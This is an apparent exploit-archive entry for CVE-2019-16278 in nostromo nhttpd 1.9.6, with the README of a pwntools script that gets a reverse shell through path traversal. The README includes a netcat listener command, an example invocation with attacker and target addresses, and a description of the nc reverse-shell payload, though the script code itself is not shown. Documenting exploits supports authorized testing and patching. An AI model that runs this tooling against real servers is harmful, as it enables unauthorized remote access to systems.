POC details: c2faf57084fd3739c206aa29c08168ebd007f1d5

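Source
Related vulnerability
Title: nostromo nhttpd path traversal vulnerability (CVE-2019-16278)
Description: nostromo nhttpd is an open-source web server. The 'http_verify' function in nostromo nhttpd 1.9.6 and earlier contains a path traversal vulnerability. The flaw stems from the network system or product failing to properly filter special elements in resource or file paths. An attacker can exploit it to access locations outside the restricted directory.
Description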
This repository contains an exploit for CVE-2019-16278 in Nostromo Web Server 1.9.6, allowing remote code execution via a directory traversal vulnerability. The script uses pwntools to establish a reverse shell. For educational and authorized testing use only.
Introduction
# CVE-2019-16278-Nostromo-1.9.6-RCE

## Requirements

- **Python 3.x**
- **pwntools** library

To install `pwntools`, use:
```bash
pip3 install pwntools
```

## Usage

### Setup

1. **Start a Listener**: On the attacking machine, start a listener on the specified port to receive the reverse shell:
   ```bash
   nc -lvnp <attacker-port>
   ```

2. **Run the Script**: Use the following command to execute the exploit script. Replace the values as needed.

   ```bash
   python3 exploit.py --attacker-ip <attacker-ip> --attacker-port <attacker-port> [-t target-ip] [-p target-port]
   ```

### Example

```bash
python3 exploit.py --attacker-ip 10.10.14.15 --attacker-port 4444 -t 10.10.10.165 -p 80
```

In this example:
- `--attacker-ip 10.10.14.15` is the IP address of the attacking machine.
- `--attacker-port 4444` is the port on which the attacking machine is listening for the reverse shell.
- `-t 10.10.10.165` specifies the target IP (default is `10.10.10.165`).
- `-p 80` specifies the target port (default is `80`).

### Script Options

| Option            | Description                                          | Default         |
|-------------------|------------------------------------------------------|-----------------|
| `-t, --target`    | IP address of the remote host                        | 10.10.10.165    |
| `-p, --port`      | Port on the remote host to target                    | 80              |
| `--attacker-ip`   | IP address of the attacking machine for the reverse shell | None (required) |
| `--attacker-port` | Port on the attacking machine for the reverse shell  | None (required) |

### Script Flow

1. **Warning Message**: Reminds the user to start a listener on the attacking machine.
2. **Payload Construction**: Builds an HTTP request with the reverse shell command using netcat (`nc`).
3. **Payload Execution**: Sends the payload to the target server and attempts to receive a reverse shell.
4. **Retries**: If the initial attempt fails, the script retries up to 3 times with feedback on each attempt.

### Code Flow Example

If successful, you should receive a reverse shell on your listener with access to the target system.

## Disclaimer

This script is intended for educational purposes and authorized testing only. Unauthorized access to computer systems is illegal. The author and contributors are not responsible for any misuse or damage caused by this tool. Use it responsibly and only on systems you have permission to test.

File snapshot

```
[4.0K] /data/pocs/c2faf57084fd3739c206aa29c08168ebd007f1d5
├── [2.6K] poc.py
├── [2.7K] README.md
└── [ 16] requirements.txt

0 directories, 3 files
```